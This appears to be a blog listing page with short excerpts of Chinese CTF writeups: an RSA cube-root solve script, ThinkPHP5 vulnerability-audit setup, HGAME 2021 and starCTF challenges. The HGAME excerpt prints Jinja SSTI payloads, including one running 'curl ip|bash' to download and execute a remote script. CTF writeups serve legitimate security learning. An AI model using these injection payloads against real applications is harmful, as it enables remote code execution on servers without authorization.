红明谷杯 Writeup by X1cT34m

Misc 签到 BP抓包爆破 Crypto RSA attack 开三次方根就有了 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 from gmpy2 import iroot from Crypto.Util.number import * p1=172071201093945294154292240631809733545154559633386758234063824053438835958515543354911249971174172649606257936857627547311760174511316984409767738981247877005802155796623587461774104951797122995266217334158736848307655543970322950339988489801672160058805422153816950022590644650247595501280192205506649936031 p2=172071201093945294154292240631809733545154559633386758234063824053438835958515543354911249971174172649606257936857627547311760174511316984409767738981247877005802155796623587461774104951797122995266217334158736848307655543970322950339988489801672160058805422153816950022590644650247595501280192205506649902034 n=28592245028568852124815768977111125874262599260058745599820769758676575163359612268623240652811172009403854869932602124987089815595007954065785558682294503755479266935877152343298248656222514238984548734114192436817346633473367019138600818158715715935132231386478333980631609437639665255977026081124468935510279104246449817606049991764744352123119281766258347177186790624246492739368005511017524914036614317783472537220720739454744527197507751921840839876863945184171493740832516867733853656800209669179467244407710022070593053034488226101034106881990117738617496520445046561073310892360430531295027470929927226907793 c=15839981826831548396886036749682663273035548220969819480071392201237477433920362840542848967952612687163860026284987497137578272157113399130705412843449686711908583139117413 e = 1+1+1 for k in range(1000): if iroot(c+k*n,3)[1]==True: m=iroot(c+k*n,3)[0] break flag=long_to_bytes(m) print(flag) Reverse go 调换顺序 ,base58没了 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import base58 text= b"2GVdudkYo2CBXoQii7gfpkjTc4gT"……

thinkphp5代码审计

本篇博文会复现大多数tp5的漏洞,持续更新 审计环境搭建 安装thinkphp 推荐使用composer,版本切换很方便 composer create-project --prefer-dist topthink/think=5.0.10 tp5.0.10 将 composer.json 文件的 require 字段设置成如下: "require": { "php": ">=5.4.0", "topthink/framework": "5.0.10" }, 然后执行 composer update PhpStorm+Xd……

HGAME 2021 Writeup

Level - Week3 Forgetful 考点:简单python-SSTI 题目是一个记事本,添加描述的时候存在SSTI,在查看页面可以看到SSTI已经成功了: 最为常规的payload: {{[].__class__.__mro__[1].__subclasses__()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('ls /').read()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('curl ip|bash').read()}} 因为命令执行处有waf,所以可以选择直接……

starCTF 2021 复现

oh-my-note 考点:时间戳爆破 题目分析 先给了源码:source.zip 题目是一个留言板,发布留言的时候输入用户名可以选择为公开或者私有 代码审计 打开源码,审计; 在create_note()函数中,如果用户不存在,就……